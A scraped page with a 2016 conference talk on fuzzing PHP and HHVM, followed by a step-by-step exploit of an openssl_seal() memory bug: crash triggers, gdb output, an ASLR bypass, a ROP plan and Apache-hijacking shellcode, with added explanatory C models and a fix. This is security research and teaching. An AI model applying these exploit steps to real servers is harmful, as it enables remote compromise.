Matlab algebra
 
C# 6.0 - April 2014 preview
C# 6.0 - April 2014 previewC# 6.0 - April 2014 preview
C# 6.0 - April 2014 preview
 
Pick up the low-hanging concurrency fruit
Pick up the low-hanging concurrency fruitPick up the low-hanging concurrency fruit
Pick up the low-hanging concurrency fruit
 
Let's build a parser!
Let's build a parser!Let's build a parser!
Let's build a parser!
 

Recently uploaded

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsPrecisely
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 

Recently uploaded (20)

Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power SystemsUnlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 

[CONFidence 2016] Mateusz Kocielski - Torturing the PHP interpreter

Slide 8: Minerva algorithm - the idea

1. script ← ""
2. X ← initial set of variables with their types
3. G ← fresh variable generator
4. F ← function database
5. for i in 1..n:
   5.1 f ← GET_RANDOM(F, X)
   5.2 v ← G()
   5.3 script ← script . v . " = " . f called with random arguments from X (but with proper types)
   5.4 X ← X ∪ (v, f's result type)
6. return script

Erghghg... what?
Slide 9: Minerva algorithm - the idea - example

F = {x = A(), x = B(x, x), y = C(x), y = D(x, y), ...}
X = ∅
x, y - simple types

1. v1 = A();        X = {x : {v1}}
2. v2 = B(v1, v1);  X = {x : {v1, v2}}
3. v3 = C(v2);      X = {x : {v1, v2}, y : {v3}}
4. v4 = D(v1, v3);  X = {x : {v1, v2}, y : {v3, v4}}
5. v5 = A();        X = {x : {v1, v2, v5}, y : {v3, v4}}
6. ...repeat it until crash
Slide 16: Minerva - example script (dummy type)

<?php
[...]
$var0 = stream_context_get_default();
$var1 = is_object($var0);
$var2 = pcntl_wait($var0,$var1);
$var3 = create_function($var1,$var0);
$var4 = stream_context_create();
$var5 = ftp_rawlist($var3,$var4,$var3);
$var6 = is_dir($var2);
$var7 = preg_filter($var4,$var3,$var5,$var3,$var2);
$var8 = is_float($var7);
$var9 = openssl_pkey_export_to_file($var3,$var1,$var5);
[...]

Slide 17: Minerva - example script (proper types)

<?php
[...]
$var0 = inet_ntop($b);
$var1 = readline_write_history();
$var2 = urlencode($str_1);
$var3 = rtrim($str_3,$str_3);
$var4 = dba_handlers();
$var5 = stream_context_create();
$var6 = idate($str_3);
$var7 = ftp_rawlist($var5,$var2);
$var8 = ksort($var7);
$var9 = use_soap_error_handler();
[...]

Slide 18: Minerva - template

+-------------------+
| header            |  - header file (i.e. <?php)
+-------------------+
| init              |  - initialization (variables etc.)
+-------------------+
| generated script  |  - minerva algorithm
.                   .
.                   .
+-------------------+
| fini              |  - destructors
+-------------------+
| footer            |  - footer file (i.e. ?>)
+-------------------+

Slide 19: Minerva - configuration file

main {
    default_length = 100;
    default_output = output.php;
    init = conf/init.php;
    fini = conf/fini.php;
    modules = [ standard, sqlite ];
    ignore_functions = [sleep, leak_variable, (...)];
}

functions {
    standard = [
        dummy zend_version(void),
        dummy func_num_args(void),
        [...]
    ];
Slide 20: Our approach

source: http://www.jtpedals.com

we use something(tm) to cluster crashes
we use Jenkins to automate things
more on our thoughts about fuzzing: http://www.slideshare.net/slajdszer/fuzzing-challenges-alligatorcon

Slide 21: Tips & tricks

start with small scripts (crashes generated by large ones are likely unreproducible)
do not stress SSD drives
you want to use AddressSanitizer (or other sanitizers)
USE_ZEND_ALLOC=0 - use the libc allocator instead of the internal one, otherwise the sanitizer cannot see heap bugs inside the chunks Zend MM carves up itself
learn to automate (dedup crashes etc.)
timelimit(1) is very useful!

Slide 22: Tips & tricks

source: http://pearlsofpromiseministries.com

OpenGrok - http://lxr.php.net/
HHVM has a bug bounty run by Facebook: https://github.com/facebook/hhvm
PHP bugs are awarded by the IBB bug bounty: https://hackerone.com/ibb-php

Slide 23: The results - PHP 7.x (HEAD)

source: http://images.phpgang.com

one machine: 8 cores + 16 GB RAM + SSD
5 days + 8 threads = around 4 million executions
cost: around 30 PLN = 7.5 USD
10-50 lines of code generated per test case
around 4150 crashes (55 were unique):
1. unknown crash - 24
2. segmentation fault - 19
3. heap-use-after-free - 6
4. heap-buffer-overflow - 4
5. stack-buffer-overflow - 1
6. double-free - 1

Slide 24: The results - HHVM (HEAD)

source: http://www.clipartbest.com

one machine: 8 cores + 16 GB RAM + SSD
5 days + 4 threads = around 800 thousand executions
cost: around 30 PLN = 7.5 USD
10-50 lines of code generated per test case
around 956 crashes (63 were unique):
1. unknown crash - 33
2. segmentation fault - 19
3. heap-use-after-free - 6
4. heap-buffer-overflow - 5

Slide 25: The results - distribution of crashes
Slide 26: HHVM - HPHP::f_dirname - heap-buffer-overflow

<?php
pathinfo("\x00");

HPHP::f_dirname (path=...) at /src/hhvm/hphp/runtime/ext/std/ext_std_file.cpp:
[...]
1870   char *buf = strndup(path.data(), path.size());
1871   int len = FileUtil::dirname_helper(buf, path.size());
[...]

strndup() stops at the embedded NUL byte, so buf is shorter than the path.size() handed to dirname_helper(), which then writes past the end of it:

==27833==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000239e11 at pc 0x7b83c11 bp 0x7fffffffb430 sp 0x7fffffffb428
WRITE of size 1 at 0x602000239e11 thread T0
    #0 0x7b83c10 in HPHP::FileUtil::dirname_helper(char*, int) /src/hhvm/hphp/runtime/base/file-util.cpp:348

Slide 27: PHP - error_reporting - use-after-free

<?php
error_reporting(1);
$var11 = date_create_immutable();
$var16 = error_reporting($var11);

Log: Fixed bug #72162 (use-after-free - error_reporting)
Log: Fix bug #72162 (again)
Log: Revert "Fix bug #72162 (again)"

==15187== ERROR: AddressSanitizer: heap-use-after-free on address 0x600600023235 at pc 0xf89a78 bp 0x7fff001c2ec0 sp 0x7fff001c2eb8
READ of size 1 at 0x600600023235 thread T0

Slide 28: PHP - pcntl_wait/pcntl_waitpid

<?php
$b = 666;
$c = &$b;
$var5 = pcntl_wait($b,0,$c);
unset($b);

-    convert_to_long_ex(z_status);
-
-    status = Z_LVAL_P(z_status);
+    status = zval_get_long(z_status);
     array_init(z_rusage);
-    Z_LVAL_P(z_status) = status;
+    zval_dtor(z_status);
+    ZVAL_LONG(z_status, status);

==5772== ERROR: AddressSanitizer: SEGV on unknown address 0x0000000002a0 (pc 0x0000010d9674 sp 0x7fff2006d5a0 bp 0x7fff2006d650 T0)
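Review bot: the new `zval_dtor(z_status); ZVAL_LONG(z_status, status);` still runs after `array_init(z_rusage);`, and the trigger passes one variable for both by-reference arguments (`$c = &$b; pcntl_wait($b,0,$c)`), so when z_status and z_rusage alias the same zval the zval_dtor() tears down the array that array_init() just built and the caller gets a long back in place of its rusage array. That ordering avoids the old type confusion (`Z_LVAL_P(z_status) = status` wrote a long into a zval that had just become an array, hence the SEGV near 0x2a0 ≈ 666), but it does not detect the aliasing; either compare the dereferenced zvals and reject or separate them before array_init(), or store the status before the rusage array is created.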
Slide 29: Exploiting bugs - PHP & heap-related problems

heap overflows
use-after-free - unserialize() - CVE-2015-0273
double frees - imap_open() - CVE-2010-4150
5.x-era allocator description: http://php-security.org/2010/05/07/mops-submission-03-sqlite_single_query-sqlite_array_query-uninitialized-memory-usage/index.html#__exploitation
FWIW, the allocator is a LIFO queue
usually the scenario is pretty much the same: take control over zval/array memory guts

Slide 30: Exploiting bugs - PHP & other bugs

similarly to other software
uninitialized memory access - sqlite_array_query() - http://php-security.org/2010/05/07/mops-submission-03-sqlite_single_query-sqlite_array_query-uninitialized-memory-usage/index.html
the heap is your friend (in non-debug builds)
everything with a dtor_func_t is your friend, e.g.:

176 struct _zend_array {
177     zend_refcounted_h gc;
[...]
195     dtor_func_t pDestructor;
196 };

http://lxr.php.net/xref/PHP_7_0/Zend/zend_types.h#195

Slide 31: Example - openssl_seal()

in 2011 we hijacked all connections to the webserver using a buffer overflow in socket_connect() - http://seclists.org/fulldisclosure/2011/May/472
Minerva found uninitialized memory usage in openssl_seal(). How hard would it be to do the same in 2016?
we assume we are operating on Ubuntu 14.04 LTS with Apache 2.4.7 and PHP 7.0.2 (compiled manually, as most distros still ship the 5.x branch).
Slide 32: openssl_seal() - the bug - 1/2

4888 /* {{{ proto int openssl_seal(string data, &string sealdata, &
4889    Seals data */
4890 PHP_FUNCTION(openssl_seal)
4891 {
4892     zval *pubkeys, *pubkey, *sealdata, *ekeys, *iv = NULL;
[...]
4935     pkeys = safe_emalloc(nkeys, sizeof(*pkeys), 0);
[...]
4942     /* get the public keys we are using to seal this data */
4943     i = 0;
4944     ZEND_HASH_FOREACH_VAL(pubkeysht, pubkey) {
4945         pkeys[i] = php_openssl_evp_from_zval(pubkey, 1, NULL, 0, &key_resources[i]);
4946         if (pkeys[i] == NULL) {
4949             goto clean_exit;

http://lxr.php.net/xref/PHP_7_0/ext/openssl/openssl.c

Slide 33: openssl_seal() - the bug - 2/2

[...]
5000 clean_exit:
5001     for (i=0; i<nkeys; i++) {
5002         if (key_resources[i] == NULL) {
5003             EVP_PKEY_free(pkeys[i]);
[...]

http://lxr.php.net/xref/PHP_7_0/ext/openssl/openssl.c

safe_emalloc() does not zero the array, so when the lookup fails at entry i the slots i+1..nkeys-1 of pkeys (and of key_resources, which gates the free) still hold whatever the previous user of that heap chunk left there, and clean_exit hands those stale values to EVP_PKEY_free().

Slide 34: openssl_seal() - is it exploitable?

376 void EVP_PKEY_free(EVP_PKEY *x)
377 {
[...]
380     if (x == NULL)
381         return;
383     i = CRYPTO_add(&x->references, -1, CRYPTO_LOCK_EVP_PKEY);
387     if (i > 0)
388         return;
395     EVP_PKEY_free_it(x);
[...]
401 static void EVP_PKEY_free_it(EVP_PKEY *x)
402 {
403     if (x->ameth && x->ameth->pkey_free) {
404         x->ameth->pkey_free(x);
[...]
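The error path of slides 32-33 and the indirect call of slide 34, reduced to a runnable model with the hardened form beside it. This is an added example in C; it is neither PHP's nor OpenSSL's code. The two structs are stripped-down stand-ins for EVP_PKEY and EVP_PKEY_ASN1_METHOD (same field roles, not OpenSSL's real layout), the "recycled chunk" stands in for a safe_emalloc() result that a previous allocation already filled, and the key_resources check of slide 33 is left out because that array is allocated the same way and is just as stale.

```c
/*
 * Model of openssl_seal()'s clean_exit path (added example, not PHP/OpenSSL code).
 * seal_vulnerable() frees every slot of an uninitialised pointer array on the
 * first failure; seal_fixed() zeroes the array first so stale slots are NULL.
 */
#include <stdio.h>
#include <string.h>

struct evp_pkey;
struct asn1_method {                    /* stand-in for EVP_PKEY_ASN1_METHOD */
    int pkey_id;
    void (*pkey_free)(struct evp_pkey *);
};
struct evp_pkey {                       /* stand-in for EVP_PKEY */
    int type;
    int references;
    const struct asn1_method *ameth;
};

/* EVP_PKEY_free() as quoted on slide 34: NULL check, refcount drop, then the
 * indirect call through ameth->pkey_free. */
static void model_pkey_free(struct evp_pkey *x)
{
    if (x == NULL)
        return;
    if (--x->references > 0)
        return;
    if (x->ameth && x->ameth->pkey_free)
        x->ameth->pkey_free(x);
}

/* What the attacker wants reached; with a real fake object this is where the
 * stack pivot of slide 41 would go. */
static int hijacked_calls;
static void attacker_pkey_free(struct evp_pkey *x)
{
    (void)x;
    hijacked_calls++;
}

static const struct asn1_method fake_ameth = { 0, attacker_pkey_free };
static struct evp_pkey fake_pkey = { 0, 1, &fake_ameth };

/* The chunk openssl_seal() gets for pkeys. safe_emalloc() does not zero it and,
 * with a LIFO allocator (slide 29), it is whatever was freed last; here every
 * leftover slot already points at the attacker's fake key. */
#define MAXKEYS 8
static struct evp_pkey *recycled_chunk[MAXKEYS];

static void spray_recycled_chunk(void)
{
    for (int i = 0; i < MAXKEYS; i++)
        recycled_chunk[i] = &fake_pkey;
}

/* php_openssl_evp_from_zval() stand-in: a NULL input is "not a usable key". */
static struct evp_pkey *lookup_key(struct evp_pkey *in)
{
    return in;
}

/* Vulnerable shape (slides 32-33): slots are never initialised, and on the
 * first lookup failure clean_exit walks all nkeys slots, stale ones included. */
int seal_vulnerable(struct evp_pkey **pubkeys, int nkeys)
{
    struct evp_pkey **pkeys = recycled_chunk;   /* safe_emalloc(nkeys, ...) */
    int i, ret = 0;

    for (i = 0; i < nkeys; i++) {
        pkeys[i] = lookup_key(pubkeys[i]);
        if (pkeys[i] == NULL) {
            ret = -1;
            goto clean_exit;
        }
    }
    /* ... the sealing itself is not modelled ... */
clean_exit:
    for (i = 0; i < nkeys; i++)
        model_pkey_free(pkeys[i]);              /* stale slot -> attacker's pkey_free */
    return ret;
}

/* Hardened shape: zero the slot array up front (what ecalloc()/memset buys), so
 * every slot the loop never reached is NULL and EVP_PKEY_free() ignores it. */
int seal_fixed(struct evp_pkey **pubkeys, int nkeys)
{
    struct evp_pkey **pkeys = recycled_chunk;
    int i, ret = 0;

    memset(pkeys, 0, (size_t)nkeys * sizeof *pkeys);
    for (i = 0; i < nkeys; i++) {
        pkeys[i] = lookup_key(pubkeys[i]);
        if (pkeys[i] == NULL) {
            ret = -1;
            goto clean_exit;
        }
    }
clean_exit:
    for (i = 0; i < nkeys; i++)
        model_pkey_free(pkeys[i]);
    return ret;
}

/* Run one variant with nkeys inputs of which input fail_at is not a key
 * (fail_at < 0: all valid); returns how often the attacker's pkey_free ran. */
int hijacks_on_failure(int (*seal)(struct evp_pkey **, int), int nkeys, int fail_at)
{
    struct evp_pkey good[MAXKEYS];
    struct evp_pkey *inputs[MAXKEYS];

    if (nkeys > MAXKEYS)
        nkeys = MAXKEYS;
    for (int i = 0; i < nkeys; i++) {
        good[i].type = 1; good[i].references = 1; good[i].ameth = NULL;
        inputs[i] = (i == fail_at) ? NULL : &good[i];
    }
    spray_recycled_chunk();
    fake_pkey.references = 1;
    hijacked_calls = 0;
    seal(inputs, nkeys);
    return hijacked_calls;
}

int main(void)
{
    printf("vulnerable, 4 keys, lookup fails at 1: %d hijacked free(s)\n",
           hijacks_on_failure(seal_vulnerable, 4, 1));
    printf("fixed,      4 keys, lookup fails at 1: %d hijacked free(s)\n",
           hijacks_on_failure(seal_fixed, 4, 1));
    return 0;
}
```

Every slot after the failing one reaches the attacker's function once, which is the primitive slides 35-39 build on; zeroing the array turns those slots into the NULL that EVP_PKEY_free() already checks for, and releasing only the 0..i-1 entries that were actually filled would be an equivalent fix.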
Slide 35: openssl_seal() - our plan

1. Stage 1 (pwning PHP)
   1.1 control the uninitialized memory
   1.2 get (or guess) a pointer that will act as a fake EVP_PKEY structure
   1.3 push that pointer as a value into EVP_PKEY_free()
   1.4 based on guesses (or leaks), build a ROP chain that lets us execute data
   1.5 execute the 2nd-stage shellcode
2. Stage 2 (pwning Apache)
   2.1 guess/find the handler addresses
   2.2 overwrite the first handler with our evil one
   2.3 get back home (do not crash the Apache child)

Slide 36: openssl_seal() - RIP control

~/src/php-7.0.2/sapi/cli$ gdb ./php
(gdb) r -r 'str_repeat("A", 512); openssl_seal($_, $_, $_, array_fill(0,64,0));'
Starting program: /home/rj4/src/php-7.0.2/sapi/cli/php -r 'str_repeat("A", 512); openssl_seal($_, $_, $_, array_fill(0,64,0));'
[...]
0x00007ffff5a3d837 in CRYPTO_add_lock () from /lib/x86_64-linux-gnu/libc[...]
(gdb) x/i $rip
=> 0x7ffff5a3d837 <CRYPTO_add_lock+71>:    add    (%r12),%r13d
(gdb) i r
[...]
r12            0x208    520
(gdb) print pkeys[i]
$11 = (EVP_PKEY *) 0x200
(gdb) print pkeys[i+1]
$12 = (EVP_PKEY *) 0x4141414141414141
(gdb) print pkeys[i+2]
$13 = (EVP_PKEY *) 0x4141414141414141

None of the 64 zeros is a key, so the lookup fails on the first entry and clean_exit walks all 64 slots. The crash is the refcount decrement (&x->references, r12 = 0x208) on the stale pointer 0x200; the slots after it already hold the 0x41s left behind by str_repeat("A", 512), and 64 slots * 8 bytes is exactly that string's 512 bytes.

Slide 37: openssl_seal() - RIP control

~/src/php-7.0.2/sapi/cli$ cat 2.php
<?php
$pem = "
-----BEGIN PUBLIC KEY-----
MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRANG2dvm8oNiH3IciNd44VZcCAwEAAQ==
-----END PUBLIC KEY-----"; /* Random RSA key */
$a = array_fill(0,64,0);
$k = openssl_pkey_get_public($pem);
$a[0] = $k;
$a[1] = $k;
$a[2] = $k;
var_dump($k);
str_repeat("A", 512);
openssl_seal($_, $_, $_, $a);
~/src/php-7.0.2/sapi/cli$ gdb ./php
[...]

Slide 38: openssl_seal() - RIP control

(gdb) r 2.php
[...]
(gdb) print pkeys[i]
$1 = (EVP_PKEY *) 0x4141414141414141

With three valid keys in front, the slot that crashes is now one we filled completely: the pointer EVP_PKEY_free() dereferences is ours.

Slide 39: openssl_seal() - memory layout

pkeys (openssl_seal())
+----------+----------+----------+----------+-----
| pkeys[0] | pkeys[1] | pkeys[2] | pkeys[3] | ...
+----------+----------+----------+----------+---
     |
     +---------------------------------+
                                       v
                          EVP_PKEY
                          +------+-----------+------------+-------+-----
                          | type | save_type | references | ameth | ...
                          +------+-----------+------------+-------+---
                                                              |
                                                              +--------+
                                                                       v
                                                  EVP_PKEY_ASN1_METHOD
                                                  +---------+-----+-----------+----
                                                  | pkey_id | ... | pkey_free | ...
                                                  +---------+-----+-----------+---
Slide 40: openssl_seal() - ASLR bypass

<?php
function get_maps() {
    $fh = fopen("/proc/self/maps", "r");
    $maps = fread($fh, 31337^2);
    fclose($fh);
    return explode("\n", $maps);
}
[...]
$pre = get_maps();
$buffer = str_repeat("\x00", 0xff0000);
$post = get_maps();
$tmp = array_diff($post, $pre);
$tmp = explode('-', array_values($tmp)[0])[0];
for ($i = 0; $i < 8; $i++)
    $buffer[0xff + 12 + $i] = pack('P', $addr)[$i];
[...]

The script can read /proc/self/maps itself. A 0xff0000-byte string is large enough to get its own anonymous mapping, so array_diff() of the two snapshots leaves exactly that mapping, and its start address (the hex field before the '-') tells us where $buffer lives; that is what lets the fake EVP_PKEY and ASN1 method structures be placed at known addresses despite ASLR.
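The same maps-diff trick in C, with the ground-truth check the PHP snippet cannot do from inside the script. This is an added example, not the exploit's code; it assumes Linux with /proc mounted and an allocator that serves a 0xff0000-byte request with a fresh mmap() (glibc does so for anything above its mmap threshold). It reports the mapping the diff yields only if that mapping really contains the buffer.

```c
/*
 * /proc/self/maps diff to locate a freshly allocated buffer (added example).
 * Returns 1 when the diff finds a mapping that contains the buffer, 0 when
 * the diff does not explain the allocation, -1 when /proc is unavailable.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAXLINES 2048
#define LINELEN 256

struct maps {
    int n;
    char line[MAXLINES][LINELEN];
};

static int read_maps(struct maps *m)
{
    FILE *fp = fopen("/proc/self/maps", "r");
    if (fp == NULL)
        return 0;
    m->n = 0;
    while (m->n < MAXLINES && fgets(m->line[m->n], LINELEN, fp) != NULL)
        m->n++;
    fclose(fp);
    return 1;
}

static int seen_before(const struct maps *pre, const char *l)
{
    for (int i = 0; i < pre->n; i++)
        if (strcmp(pre->line[i], l) == 0)
            return 1;
    return 0;
}

/* Allocate `size` bytes the way the exploit's str_repeat() does, then find the
 * buffer by diffing the maps before and after. On success *start_out is the
 * mapping start, i.e. what the PHP snippet's explode('-', ...)[0] recovers. */
int locate_buffer_by_maps_diff(size_t size, uintptr_t *start_out)
{
    static struct maps pre, post;   /* static: the snapshots must not add mappings */
    unsigned char *buf;
    int found = 0;

    if (!read_maps(&pre))
        return -1;
    buf = malloc(size);
    if (buf == NULL)
        return -1;
    memset(buf, 0, size);           /* touch it, as str_repeat("\x00", n) would */
    if (read_maps(&post)) {
        for (int i = 0; i < post.n; i++) {
            unsigned long long lo, hi;
            if (seen_before(&pre, post.line[i]))
                continue;           /* array_diff($post, $pre) */
            if (sscanf(post.line[i], "%llx-%llx", &lo, &hi) != 2)
                continue;
            if ((uintptr_t)buf >= lo && (uintptr_t)buf < hi) {
                if (start_out)
                    *start_out = (uintptr_t)lo;
                found = 1;
                break;
            }
        }
    }
    free(buf);
    return found;
}

int main(void)
{
    uintptr_t start = 0;
    int r = locate_buffer_by_maps_diff(0xff0000, &start);
    if (r == 1)
        printf("[+] buffer mapping starts @ 0x%lx\n", (unsigned long)start);
    else
        printf("[-] %s\n", r < 0 ? "no /proc/self/maps here" : "diff did not find the buffer");
    return r == 1 ? 0 : 1;
}
```

The check matters because the diff can also pick up unrelated changes (a grown [heap] line, a library mapped on demand); iterating over every new line and testing it against the real address is what turns the guess into a verified leak, and in the exploit the buffer's offset inside the mapping (0x14 in slide 42's output) has to be added to the start address the diff gives.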
  • 41. openssl_seal() - ROP
    we use the ROP technique to neutralise NX
    we ended up using gadgets from the PHP binary to pivot the stack
    we used the address of our controlled buffer, which luckily was on the stack
    then we call mprotect() and set RWX perms
    exploit code is here: http://akat1.pl/?id=1
  • 42. openssl_seal() - pwning PHP
    ~/src/php-7.0.2-test/sapi/cli$ ./php 3.php
    [+] buffer string @ 0x7f00ef400014
    [+] faking EVP_PKEY @ 0x7f00ef400113
    [+] faking ASN @ 0x7f00ef400113
    [+] faking pkey_free @ 0x7f00ef4001af = a59203
    [+] libc base @ 0x7f00f1540000
    [+] mprotect @ 0x7f00f1634a20
    [+] building ropchain
    [+] triggering openssl_seal(), spawning shell
    have phun...
    $
  • 43. openssl_seal() - it's so useless
    source: http://www.ifunny.com
  • 44. openssl_seal() - hijacking apache2 requests
    source: http://linuxconfig.net
    Here's what we want to do:
    1. register memory that will survive subsequent requests
    2. copy Apache handler code to the registered memory
    3. register a request handler that will be run really first
    4. do something to clean the corrupted state and let the Apache child process happily serve subsequent requests
  • 45. openssl_seal() - shellcode - steps 1-3
    void shellcode(void *(mmap_addr)(void *, size_t, int, int, int, off_t),
                   void *(memcpy_addr)(void *, void *, size_t),
                   int (*ap_hook_quick_handler_addr)(void *, void *, void *, int),
                   unsigned char *handler, size_t len)
    {
        void *handler_space;
        unsigned char *p;

        /* create space for our handler, as it needs to survive sequential
         * requests */
        p = handler_space = mmap_addr(0, 0x2000, PROT_WRITE|PROT_EXEC|PROT_READ,
                                      MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

        /* ~memcpy(3) */
        while(len--)
            *(p++) = *(handler++);

        /* register new filter */
